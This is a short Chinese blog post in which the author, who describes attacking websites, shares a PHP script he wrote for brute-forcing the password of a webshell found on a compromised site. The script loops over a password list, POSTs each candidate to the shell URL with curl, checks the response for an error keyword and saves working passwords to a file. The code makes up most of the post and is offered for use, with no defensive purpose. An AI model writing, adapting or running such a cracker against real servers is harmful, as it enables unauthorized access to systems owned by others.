送你更快的webshell工程爆破脚本制作!

原创 社长  2019-11-04 10:45:08  阅读 97 次 评论 0 条
重庆专业seo
摘要:

撸站的时候遇到一个大马,在网上下载了无数webshell爆破器,没一个能用的!真是鄙视这群写代码的,不测试就到处发布!本来打算用c#写的,电脑没装环境,就用php写了一个!因为php特性,单线程的,多开几个窗口吧!<?php$passarr=file("pass2.txt");foreach ($passarr as $key => $value) {        $value=str_replace(chr(10),&q

撸站的时候遇到一个大马,在网上下载了无数webshell爆破器,没一个能用的!


真是鄙视这群写代码的,不测试就到处发布!


本来打算用c#写的,电脑没装环境,就用php写了一个!


因为php特性,单线程的,多开几个窗口吧!


<?php

$passarr=file("pass2.txt");

foreach ($passarr as $key => $value) {

        $value=str_replace(chr(10),"",str_replace(chr(13),"",$value));

        $gettoken=postdata("http://127.0.0.1/shell.php",array("postpass" => "{$value}"),"密码错误");

}

/*

/ postdata($url,$data,$par);

/ $url webshell地址 string

/ $data 把postdata换成你的密码参数

/ $par  错误关键词

*/

function postdata($url,$data,$par){

    $curl = curl_init();

    curl_setopt($curl, CURLOPT_URL, $url);

    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);

    curl_setopt($curl, CURLOPT_POST, 1);

    $post_data = $data;

    curl_setopt($curl, CURLOPT_POSTFIELDS, $post_data);

    $data1 = curl_exec($curl);

    curl_close($curl);

    if (strpos($data1, $par)>1) {

        print_r($data["postpass"]."错误\n");

        return;

    }else{

                file_put_contents("OOOK.txt",$data["postpass"],FILE_APPEND);

                die($data["postpass"]."爆破成功");

        }

    print_r(strpos($data1, $par));

    print_r($par);

        }

function decodeUnicode($str)

{

    return preg_replace_callback('/\\\\u([0-9a-f]{4})/i',

        create_function(

            '$matches',

            'return mb_convert_encoding(pack("H*", $matches[1]), "UTF-8", "UCS-2BE");'

        ),

        $str);

}

?>

送你更快的webshell工程爆破脚本制作!

本文地址:http://dxf6.com/post/649.html
版权声明:本文为原创文章,版权归 社长 所有,欢迎分享本文,转载请保留出处!
重庆专业seo
数据湾

发表评论


表情

还没有留言,还不快点抢沙发?